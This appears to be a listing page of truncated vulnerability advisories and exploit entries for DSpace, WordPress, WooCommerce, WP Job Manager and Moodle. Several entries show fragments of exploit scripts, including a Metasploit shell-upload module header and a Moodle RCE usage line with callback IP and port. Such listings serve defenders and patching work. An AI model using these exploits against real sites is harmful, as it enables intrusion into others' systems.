JSPUI's controlled vocabulary feature vulnerable to Open Redirect before v6.4 and v5.11

Impact The JSPUI controlled vocabulary servlet is vulnerable to an open redirect attack, where an attacker can craft a malicious URL that looks like a legitimate DSpace/repository URL. When that URL is clicked by the target, it redirects them to a site of the attacker's choice. This vulnerability...

WordPress 5.0.0 Remote Code Execution

Exploit Title: WordPress 5.0.0 - Image Remote Code Execution Date: 2020-02-01 Exploit Authors: OUSSAMA RAHALI aka V0lck3r Discovery Author : RIPSTECH Technology Version: WordPress 5.0.0 and :/ ' printusage url = sys.argv1 username = sys.argv2 password = sys.argv3 wptheme = sys.argv4 wpscan result...

WordPress Core 5.0.0 - Crop-image Shell Upload (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WordPress Crop-image Shell Upload', 'Description' = %q This module exploits a path traversal and a local file inclusion vulnerability on WordPres...

Moodle 3.4.1 - Remote Code Execution Exploit

Exploit for php platform in category web applications php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the...

WordPress 5.1 CSRF lead to remote command execution vulnerability alerts-a vulnerability alert-the black bar safety net

Report number: B6-2019-031301 Report source: 360-CERT The authors of the report: a 360-CERT Update date: 2019-03-13 0x00 vulnerability background 2019 03 May 13, 360 CERT monitoring to RIPSTECH released WordPress 5.1 CSRF vulnerability leads to remote code execution the contents of the details...

WordPress WooCommerce plugin <= 3.5.0 - Authenticated Stored Cross-Site Scripting (XSS) vulnerability

Authenticated Stored Cross-Site Scripting XSS vulnerability found by Ripstech in WordPress WooCommerce plugin versions = 3.5.0. Solution Update the WordPress WooCommerce plugin to the latest available version at least 3.5.1...

WordPress WP Job Manager plugin <= 1.31.2 - Phar Deserialization vulnerability

Phar Deserialization vulnerability found by Ripstech in WordPress WP Job Manager plugin versions = 1.31.2. Solution Update the WordPress WP Job Manager plugin to the latest available version at least 1.31.3...

WordPress <=4.9.6 - Arbitrary Code Execution vulnerability

Arbitrary Code Execution vulnerability found by ripstech in WordPress versions =4.9.6. Solution A new version v4.9.7 including a patch has been released. Please update to 4.9.7 version...